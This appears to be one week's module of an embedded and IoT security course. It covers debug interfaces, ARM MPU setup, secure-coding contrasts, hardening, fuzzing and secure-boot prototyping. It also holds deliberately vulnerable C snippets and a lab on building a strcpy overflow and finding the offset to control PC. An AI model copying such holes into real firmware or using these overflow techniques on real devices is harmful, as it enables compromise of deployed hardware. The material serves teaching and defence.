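
This only works if the capture contains at least one isolated single-bit pulse; glitches shorter than a bit time will push the estimate too high, so filter noise before measuring.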

JTAG (Joint Test Action Group):
┌─────────────────────────────────────────────────────────────┐
│ Purpose: Debugging and testing                              │
│ Pins: TDI, TDO, TCK, TMS, (TRST)                            │
│                                                             │
│ Capabilities:                                               │
│ - Full processor control (halt, step, run)                  │
│ - Read/write memory                                         │
│ - Read/write registers                                      │
│ - Dump flash contents                                       │
│                                                             │
│ Tools: OpenOCD, J-Link, Bus Pirate                          │
└─────────────────────────────────────────────────────────────┘

SWD (Serial Wire Debug):
┌─────────────────────────────────────────────────────────────┐
│ Purpose: ARM's 2-wire alternative to JTAG                   │
│ Pins: SWDIO, SWCLK                                          │
│ Common on: ARM Cortex-M devices                             │
│ Same debug access as JTAG (no boundary scan)                │
└─────────────────────────────────────────────────────────────┘

🛡️ Defensive Architecture & Secure Embedded Development

Offensive skills show you how embedded systems break. Defensive skills show you how to build them securely from day one.

Secure Embedded Development Principles

Building secure embedded systems requires understanding the constraints and working with them, not against them. Security isn't about adding megabytes of protection; it's about minimizing attack surface and using hardware security features effectively.

Memory Protection Configuration

ARM Cortex-M MPU Configuration:

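// The MPU_RASR_SIZE_* and MPU_RASR_AP_* macros are assumed to be
// project-defined encodings of the RASR SIZE and AP fields (ARMv7-M MPU).

// Region 0: code (flash), read-only and executable.
// XN (execute-never) must NOT be set here, or code cannot run from flash.
MPU->RBAR = FLASH_BASE | MPU_RBAR_VALID_Msk | 0;
MPU->RASR = MPU_RASR_ENABLE_Msk |
            MPU_RASR_SIZE_512KB | MPU_RASR_AP_ROPRIV;

// Region 1: data (RAM), read-write, execute-never
MPU->RBAR = RAM_BASE | MPU_RBAR_VALID_Msk | 1;
MPU->RASR = MPU_RASR_ENABLE_Msk | MPU_RASR_XN_Msk |
            MPU_RASR_SIZE_64KB | MPU_RASR_AP_RWPRIV;

// Enable the MPU; PRIVDEFENA keeps the default memory map for privileged code
MPU->CTRL = MPU_CTRL_ENABLE_Msk | MPU_CTRL_PRIVDEFENA_Msk;
__DSB();  // ensure the new MPU settings have taken effect
__ISB();  // before the next instruction is fetched

Result: Code execution from RAM is blocked, which stops injected shellcode. Code-reuse attacks such as ROP are not affected by this setting.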
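
To see what macros like MPU_RASR_SIZE_512KB have to encode, the sketch below computes RASR values for the two regions using the ARMv7-M field layout: ENABLE in bit 0, SIZE in bits 5:1 (region size is 2^(SIZE+1) bytes), AP in bits 26:24, and XN in bit 28. It is a worked arithmetic example, not vendor code. The helper names are made up for illustration, and the memory attribute bits (TEX, C, B, S) are left at zero for brevity.

```python
# ARMv7-M MPU_RASR field positions (Cortex-M3/M4/M7 style MPU).
RASR_ENABLE = 1 << 0
RASR_SIZE_SHIFT = 1
RASR_AP_SHIFT = 24
RASR_XN = 1 << 28

AP_PRIV_RW = 0b001  # privileged read-write, unprivileged no access
AP_PRIV_RO = 0b101  # privileged read-only, unprivileged no access


def size_field(region_bytes):
    """Return SIZE such that region_bytes == 2 ** (SIZE + 1)."""
    if region_bytes < 32 or region_bytes & (region_bytes - 1):
        raise ValueError("region size must be a power of two, at least 32 bytes")
    return region_bytes.bit_length() - 2


def rasr(region_bytes, ap, execute_never):
    """Compose an MPU_RASR value for an enabled region."""
    value = RASR_ENABLE
    value |= size_field(region_bytes) << RASR_SIZE_SHIFT
    value |= ap << RASR_AP_SHIFT
    if execute_never:
        value |= RASR_XN
    return value


def base_is_aligned(base, region_bytes):
    """A region's base address must be a multiple of its size."""
    return base % region_bytes == 0


flash_rasr = rasr(512 * 1024, AP_PRIV_RO, execute_never=False)
ram_rasr = rasr(64 * 1024, AP_PRIV_RW, execute_never=True)
print(hex(flash_rasr), hex(ram_rasr))
```

Note that the flash region leaves XN clear while the RAM region sets it; that single bit is what separates an executable region from a data-only one.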

Secure Coding for Embedded

Common Embedded Vulnerabilities & Mitigations:

VULNERABILITY: Stack buffer overflow
BAD:  char buf[32]; strcpy(buf, user_input);
GOOD: char buf[32]; strncpy(buf, user_input, sizeof(buf)-1);
      buf[sizeof(buf)-1] = '\0';

VULNERABILITY: Integer overflow leading to buffer overflow
BAD:  uint8_t len = get_length();   // lengths above 255 wrap silently
      char *buf = malloc(len);      // no bounds check, no NULL check
      memcpy(buf, data, len);
GOOD: uint16_t len = get_length();
      if (len > MAX_ALLOWED) return ERROR;
      char *buf = malloc(len + 1);  // +1 for the null terminator
      if (!buf) return ERROR;
      memcpy(buf, data, len);
      buf[len] = '\0';

VULNERABILITY: Hardcoded credentials
BAD:  const char wifi_password[] = "password123";
GOOD: Store credentials in secure flash region or secure element
      Use device-unique keys, never hardcode

VULNERABILITY: Unprotected debug interfaces
BAD:  UART always enabled with root shell
GOOD: Disable UART in production builds
      If needed, require authentication
      Use TrustZone to isolate debug functionality
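
The integer-overflow item above is easier to reason about with concrete numbers. This short sketch uses ctypes to mimic what happens when a claimed length is stored in a uint8_t, and contrasts it with an explicit range check. MAX_ALLOWED and the function names are hypothetical stand-ins for whatever limits your firmware defines.

```python
import ctypes

MAX_ALLOWED = 1024  # hypothetical upper bound for a single message


def stored_in_uint8(claimed_len):
    """Value that ends up in a uint8_t variable (silent wrap modulo 256)."""
    return ctypes.c_uint8(claimed_len).value


def validate_length(claimed_len):
    """Reject out-of-range lengths instead of letting them wrap."""
    if not 0 <= claimed_len <= MAX_ALLOWED:
        raise ValueError("length out of range")
    return claimed_len


claimed = 300
print(stored_in_uint8(claimed))   # the buffer would be sized from this value
print(validate_length(claimed))   # the checked path keeps the real length
```

Any later code that trusts the original 300-byte length while the buffer was sized from the wrapped value will write past the end of the allocation.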

Hardening Checklist

Embedded System Hardening:

✓ Enable MPU/MMU if available
✓ Configure readable/writable/executable permissions
✓ Implement stack canaries (compiler flag: -fstack-protector-all)
✓ Disable JTAG/SWD in production (fuse programming)
✓ Implement secure boot with signature verification
✓ Use hardware crypto accelerator, never roll your own crypto
✓ Generate unique device keys during manufacturing
✓ Implement firmware encryption at rest
✓ Enable anti-rollback protection
✓ Implement input validation on all external data
✓ Minimize code size (reduce attack surface)
✓ Disable unused peripherals and services
✓ Implement watchdog timer for fault recovery
✓ Use TLS 1.3 for network communication
✓ Implement proper random number generation (TRNG)

Real-World Breach: VPNFilter (2018)

VPNFilter infected 500,000+ routers and NAS devices running embedded Linux. The malware survived reboots by writing to flash, demonstrating persistence on embedded systems.

Attack Vector: The attackers exploited default credentials and unpatched vulnerabilities in embedded web servers. Once root access was gained, the malware wrote itself to flash for persistence.

Lessons Learned:

Disable default credentials: force a password change on first boot
Implement automatic security updates for embedded devices
Use code signing and verified boot to prevent persistent malware
Implement network segmentation: place IoT devices on a separate VLAN
Monitor for anomalous firmware modifications
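
Monitoring for firmware modification can start with something as simple as comparing a dumped image against a known-good digest. The sketch below assumes you already have the image bytes (for example from a flash dump) and a trusted SHA-256 value published by the vendor or recorded at provisioning; the function names and sample bytes are illustrative.

```python
import hashlib
import hmac


def firmware_digest(image):
    """Return the SHA-256 digest of a firmware image as a hex string."""
    return hashlib.sha256(image).hexdigest()


def firmware_modified(image, known_good_digest):
    """True if the image does not match the trusted digest."""
    # compare_digest avoids leaking how many leading characters matched.
    return not hmac.compare_digest(firmware_digest(image), known_good_digest)


golden_image = b"\x7fELF...original firmware bytes..."
trusted = firmware_digest(golden_image)

tampered_image = golden_image + b"\x00implant"
print(firmware_modified(golden_image, trusted))
print(firmware_modified(tampered_image, trusted))
```

A digest check only detects change. It does not prevent a compromised device from lying about its own contents, which is why the check is best run from a trusted vantage point such as an external flash reader or a verified bootloader.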

Secure SDLC for Embedded

Embedded Security Development Lifecycle:

1. Requirements Phase:
   - Define threat model (STRIDE for embedded)
   - Specify security requirements (encryption, auth, updates)
   - Choose hardware with security features (MPU, crypto accelerator)

2. Design Phase:
   - Architecture review: minimize privileged code
   - Define trust boundaries (TrustZone secure/normal world)
   - Plan key management and provisioning

3. Implementation Phase:
   - Follow MISRA C or CERT C coding standards
   - Use static analysis (Coverity, CodeSonar)
   - Implement security features early, not as add-ons

4. Verification Phase:
   - Fuzzing on protocol parsers
   - Penetration testing (hardware and firmware)
   - Side-channel analysis if handling secrets

5. Manufacturing:
   - Secure key injection (HSM-based)
   - Disable debug interfaces via efuses
   - Verify secure boot before shipping

6. Deployment & Maintenance:
   - Implement OTA updates with signing
   - Monitor for vulnerabilities in dependencies
   - Have incident response plan
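
The fuzzing step in the verification phase can be sketched in a few lines. The example below defines a toy tag-length-value parser (a hypothetical format, not a real protocol) and a small mutation fuzzer that checks one property: malformed input must be rejected with ValueError and never trigger any other exception. A real campaign would use a coverage-guided fuzzer against the actual firmware parser; this only illustrates the idea.

```python
import random


def parse_tlv(data):
    """Parse records of the form: 1-byte tag, 1-byte length, value bytes."""
    records = []
    i = 0
    while i < len(data):
        if len(data) - i < 2:
            raise ValueError("truncated header")
        tag, length = data[i], data[i + 1]
        i += 2
        if length > len(data) - i:
            raise ValueError("length exceeds remaining input")
        records.append((tag, data[i:i + length]))
        i += length
    return records


def mutate(seed, rng):
    """Apply a few random byte flips, truncations, or insertions."""
    data = bytearray(seed)
    for _ in range(rng.randint(1, 4)):
        choice = rng.randrange(3)
        if choice == 0 and data:
            data[rng.randrange(len(data))] = rng.randrange(256)
        elif choice == 1 and data:
            del data[rng.randrange(len(data)):]
        else:
            data.insert(rng.randrange(len(data) + 1), rng.randrange(256))
    return bytes(data)


def fuzz(parser, seed, iterations=2000, rng_seed=1234):
    """Return the inputs that made the parser fail in an unexpected way."""
    rng = random.Random(rng_seed)  # fixed seed keeps runs reproducible
    failures = []
    for _ in range(iterations):
        case = mutate(seed, rng)
        try:
            parser(case)
        except ValueError:
            pass  # clean rejection is the expected outcome
        except Exception as exc:
            failures.append((case, exc))
    return failures


SEED_INPUT = b"\x01\x02hi\x02\x00\x03\x04data"
print(len(fuzz(parse_tlv, SEED_INPUT)))
```

In C firmware the equivalent of an unexpected exception is a crash, hang, or sanitizer report, so the same harness structure applies with the parser compiled for the host and run under AddressSanitizer.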

Defensive Labs

Lab: Configure ARM Cortex-M MPU for W^X

Download ARM Cortex-M example code and configure the MPU to enforce a write-xor-execute (W^X) policy. Test that code execution from RAM fails, then verify that a buffer overflow can no longer lead to shellcode execution.

Tools: QEMU ARM emulator, GCC ARM cross-compiler
Time: 60 minutes

Lab: Implement Secure Boot Verification

Write a simple bootloader that verifies firmware signature before execution. Use RSA-2048 or ECDSA-P256. Test that tampered firmware is rejected. Implement fallback to recovery mode on verification failure.

Tools: OpenSSL for key generation and signing, ARM toolchain
Time: 90 minutes
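
Before writing the bootloader in C, it can help to prototype the decision logic on the host. The sketch below models only the control flow: verify first, then read the version, then boot or fall back to recovery. Two things are assumptions made for illustration: the image header (a single 32-bit little-endian version field) and the verifier, which is an HMAC-SHA256 stand-in so the example runs with the standard library. It is not an RSA-2048 or ECDSA-P256 check; in the lab, replace it with a real public-key signature verification.

```python
import hashlib
import hmac
import struct

HEADER = struct.Struct("<I")  # hypothetical header: 32-bit firmware version


def demo_verify(key, message, signature):
    """Stand-in verifier (HMAC-SHA256), NOT a public-key signature check."""
    expected = hmac.new(key, message, hashlib.sha256).digest()
    return hmac.compare_digest(expected, signature)


def boot_decision(image, signature, min_version, verify):
    """Return "boot" for a valid, current image, otherwise "recovery"."""
    if len(image) < HEADER.size:
        return "recovery"
    # Verify before trusting any field inside the image.
    if not verify(image, signature):
        return "recovery"
    (version,) = HEADER.unpack_from(image)
    if version < min_version:  # anti-rollback check
        return "recovery"
    return "boot"


demo_key = b"demo-key-not-for-production"
image = HEADER.pack(3) + b"firmware payload"
signature = hmac.new(demo_key, image, hashlib.sha256).digest()


def verify(message, sig):
    return demo_verify(demo_key, message, sig)


tampered = image[:-1] + b"X"
print(boot_decision(image, signature, 2, verify))
print(boot_decision(tampered, signature, 2, verify))
print(boot_decision(image, signature, 4, verify))
```

The ordering matters: the version field is only read after the whole image has been authenticated, so an attacker cannot influence the rollback check with an unsigned header.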

📚 Building on CSY101 Week-13: Use STRIDE to threat model your embedded system design before implementing. CSY102 Week-08: Apply cryptographic principles for secure boot and firmware encryption.

📚 Building on Prior Knowledge

Embedded security connects directly to earlier foundations:

CSY101 Week 08 (Network Security): Apply to constrained IoT protocols (6LoWPAN, Thread).
CSY102 Week 08 (Cryptography): Implement AES, ECC on resource-constrained devices.
CSY103 (Programming): C programming skills essential for embedded development and exploitation.
CSY104 Week 06 (OS Internals): RTOS concepts build on general OS knowledge.

🎯 Hands-On Labs (Free & Essential)

Apply what you learned through practical embedded system challenges. Complete these labs to build hands-on ARM and embedded exploitation skills.

🎮 Azeria Labs: ARM Assembly Basics

What you'll do: Learn ARM assembly from scratch through interactive tutorials. Understand registers, memory addressing, function calling conventions, and stack operations. Write and debug simple ARM programs.

Why it matters: ARM assembly is the language of IoT exploitation. You can't write exploits, analyze malware, or reverse engineer firmware without reading ARM code. This is foundational for all future IoT security work.
Time estimate: 2-3 hours

Start Azeria Labs ARM Assembly →

🎮 Exploit Education: Phoenix (ARM)

What you'll do: Complete the Phoenix ARM exploitation challenges. Start with stack buffer overflows, progress to format string vulnerabilities, and finish with ROP chains. Each challenge builds on the previous.

Why it matters: These are real exploitation techniques used against embedded devices. The skills transfer directly to IoT device exploitation. Understanding how to exploit ARM binaries is essential for offensive IoT security.
Time estimate: 4-5 hours

Start Phoenix ARM Challenges →

🔧 Lab: QEMU ARM Emulation Setup

What you'll do: Set up QEMU to emulate ARM devices. Install ARM cross-compilation toolchain. Compile and run a simple ARM program in QEMU. Set up GDB debugging for ARM binaries.

Why it matters: You can't always test on physical hardware. QEMU emulation lets you analyze ARM firmware without the device. This setup is used throughout the rest of the course for firmware analysis.
Time estimate: 1-1.5 hours

💡 Lab Strategy: Start with Azeria Labs to build ARM fundamentals. Then tackle Phoenix challenges to apply exploitation techniques. Set up QEMU for future firmware analysis work. Total: 700 XP across 7-9.5 hours of hands-on learning!

Guided Lab: ARM Assembly with Azeria Labs

Objective: Complete basic ARM assembly exercises to understand embedded code execution.

Time: 90 minutes

Lab Steps

1. Set up ARM Environment (20 min):
   - Use QEMU ARM emulator or Raspberry Pi
   - Install cross-compiler: arm-linux-gnueabi-gcc

2. Complete Azeria Labs Part 1 (30 min):
   - Visit azeria-labs.com ARM Assembly Basics
   - Work through registers and memory instructions

3. Analyze a Simple Buffer Overflow (40 min):
   - Write vulnerable C program with strcpy
   - Compile with -fno-stack-protector
   - Use GDB to trace execution and observe LR overwrite

Success Criteria: Successfully traced ARM program execution and demonstrated stack buffer overflow control of PC.
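
When tracing the overflow in GDB, a non-repeating input pattern makes it easy to tell exactly which bytes landed in the saved return address. The sketch below is a small stand-alone version of that idea using only the standard library; the helper names are made up for this example, and pwntools offers similar functionality through cyclic() and cyclic_find().

```python
import string
import struct

# "Aa0Aa1Aa2..." where every 3-character chunk is unique.
_FULL_PATTERN = "".join(
    upper + lower + digit
    for upper in string.ascii_uppercase
    for lower in string.ascii_lowercase
    for digit in string.digits
)


def make_pattern(length):
    """Return the first `length` bytes of the non-repeating pattern."""
    if not 0 <= length <= len(_FULL_PATTERN):
        raise ValueError("unsupported pattern length")
    return _FULL_PATTERN[:length].encode("ascii")


def find_offset(pattern, register_value):
    """Locate the little-endian register value inside the pattern.

    Also tries the value with bit 0 set, since a Thumb-state PC may be
    reported with that bit cleared. Returns -1 if nothing matches.
    """
    for candidate in (register_value, register_value | 1):
        needle = struct.pack("<I", candidate & 0xFFFFFFFF)
        index = pattern.find(needle)
        if index != -1:
            return index
    return -1


pattern = make_pattern(100)
# Pretend the crash left these four pattern bytes in PC.
crashed_pc = struct.unpack("<I", pattern[68:72])[0]
print(find_offset(pattern, crashed_pc))
```

Feed the pattern to the vulnerable program, read PC (or LR) from GDB after the crash, and pass that value to find_offset(); the result is the number of padding bytes needed before the return address.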

Reading Resources (Free + Authoritative)

Complete the required resources to deepen your embedded systems understanding.

Azeria Labs: ARM Assembly Basics (Parts 1-3) · 90-120 min · 100 XP · Resource ID: csy304_w3_r1 (Required)
FreeRTOS Documentation: RTOS Fundamentals · 60 min · 50 XP · Resource ID: csy304_w3_r2 (Required)
ARM Architecture Documentation · Reference · 25 XP · Resource ID: csy304_w3_r3 (Optional)

Outcome Check

Identify common IoT processor architectures (ARM Cortex-M/A, MIPS, Xtensa as used in the ESP32)
Explain embedded memory types and their security implications
Compare FreeRTOS, Zephyr, and embedded Linux
Read basic ARM assembly and understand function calls
Identify UART, JTAG, and SWD debug interfaces
Configure ARM Cortex-M MPU for memory protection
Implement secure coding practices for embedded systems

Resources

Azeria Labs ARM Assembly

Excellent ARM assembly tutorial series

FreeRTOS

Leading real-time operating system for IoT

Week 03 Quiz